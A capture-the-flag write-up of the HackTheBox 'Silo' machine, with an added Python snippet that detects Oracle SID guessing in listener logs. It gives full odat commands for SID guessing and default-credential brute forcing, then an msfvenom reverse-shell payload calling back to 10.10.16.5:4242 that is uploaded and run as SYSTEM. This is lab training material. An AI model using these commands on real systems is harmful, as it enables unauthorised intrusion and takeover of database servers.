Hack The Box — Silo — without Metasploit (TJNull’s list for OSCP)
This is my 29th write-up, covering Silo, a machine from TJNull’s list of HackTheBox machines for OSCP Practice. The full list can be found here.
A general penetration test or CTF usually involves three major phases:
- Enumeration and Scanning (Information Gathering).
- Initial Foothold.
- Privilege Escalation.
Let’s get started with the box!
Enumeration
First, let’s run an nmap scan on default ports to see what services are running on the target system.
nmap -sC -sV -O -Pn -oA nmap/initial silo.htb
So, we have an HTTP server running and an Oracle TNS listener on ports 1521 and 4196.
Let’s jump to the HTTP server and see what we have there.
Default page for Microsoft IIS. Let’s try directory busting and see if we get anything.
gobuster dir -u http://silo.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -x asp,db,jsp,html,log,txt -t 200 -k --no-error
But it does not reveal anything.
Let’s try enumerating the Oracle TNS listener. We will be using odat (Oracle Database Attacking Tool) for that.
First, let’s enumerate the valid SIDs.
odat sidguesser -s silo.htb -p 1521
XE seems to be a valid SID for the server.
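From the defender's side, the SID guessing above shows up in the Oracle listener log as a run of refused connections. The following is an added example, not part of the original write-up: it flags sources that request several unknown SIDs (listener return code 12505). The log lines are constructed in the text listener.log layout, and the function names and threshold are assumptions.

```python
import re
from collections import defaultdict


def _line(ts, src, sid, code):
    # Constructed sample entry in the text listener.log layout:
    # timestamp * connect data * client address * event * SID * return code
    return (f"12-MAR-2024 {ts} * (CONNECT_DATA=(SID={sid})"
            f"(CID=(PROGRAM=)(HOST=client)(USER=user))) * "
            f"(ADDRESS=(PROTOCOL=tcp)(HOST={src})(PORT=40112)) * "
            f"establish * {sid} * {code}")


# Constructed sample: one source cycles through SID names, another is an
# ordinary client that mistypes the SID once.
SAMPLE_LOG = "\n".join([
    _line("10:01:02", "10.10.16.5", "ORCL", 12505),
    _line("10:01:02", "10.10.16.5", "PROD", 12505),
    _line("10:01:03", "10.10.16.5", "TEST", 12505),
    _line("10:01:03", "10.10.16.5", "DB01", 12505),
    _line("10:01:04", "10.10.16.5", "XE", 0),
    _line("10:05:10", "10.10.10.20", "XEE", 12505),
    _line("10:05:30", "10.10.10.20", "XE", 0),
])

LINE_RE = re.compile(
    r"\(ADDRESS=\(PROTOCOL=tcp\)\(HOST=(?P<src>[^)]+)\)\(PORT=\d+\)\)"
    r"\s*\*\s*establish\s*\*\s*(?P<sid>\S+)\s*\*\s*(?P<code>\d+)\s*$",
    re.IGNORECASE,
)


def find_sid_guessing(log_text, min_distinct=3):
    """Return {source: sorted unknown SIDs} for sources that received
    TNS-12505 (SID not known to the listener) on at least min_distinct
    different SID names."""
    failed = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if m and m.group("code") == "12505":
            failed[m.group("src")].add(m.group("sid").upper())
    return {src: sorted(sids) for src, sids in failed.items()
            if len(sids) >= min_distinct}


if __name__ == "__main__":
    for src, sids in find_sid_guessing(SAMPLE_LOG).items():
        print(f"{src}: {len(sids)} unknown SIDs requested: {', '.join(sids)}")
```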
Metasploit ships a list of default Oracle usernames and passwords. Let’s locate it and copy it.
locate oracle_default_userpass.txt
cp /usr/share/metasploit-framework/data/wordlists/oracle_default_userpass.txt .
The username and passwords in this list are separated by a space instead of a forward slash (/). We’ll have to change it to forward slash so that the ODAT tool is able to parse the file. This can be done in vi using the following command.
:%s/ /\//g
After the substitution, each line in the file has the form username/password.
Now let’s use this to brute force the credentials.
odat passwordguesser -s silo.htb -p 1521 -d XE --accounts-file /root/TJNull/Windows/Silo/oracle_default_userpass.txt
(You may have to give the full path of the oracle_default_userpass.txt file.)
And we got the credentials scott/tiger.
Initial Foothold
ODAT has a utlfile module that allows you to upload, download or delete a file. Since we are trying to get code execution on the box, let’s upload a malicious executable that sends a reverse shell back to our attack machine.
For that, we first need to generate a shell for Windows.
msfvenom -p windows/shell_reverse_tcp LHOST="10.10.16.5" LPORT=4242 -f exe > shell.exe
Now, let’s upload the file using the utlfile module.
odat utlfile -s silo.htb -p 1521 -U "scott" -P "tiger" -d XE --putFile /temp shell.exe shell.exe
We get a privilege error. Just add the --sysdba flag to the command.
odat utlfile -s silo.htb -p 1521 -U "scott" -P "tiger" -d XE --putFile /temp shell.exe /root/TJNull/Windows/Silo/shell.exe --sysdba
Let’s start a listener and execute it using externaltable.
odat externaltable -s silo.htb -p 1521 -U "scott" -P "tiger" -d XE --exec /temp shell.exe --sysdba
And we got a system shell! No Privilege Escalation needed.
:)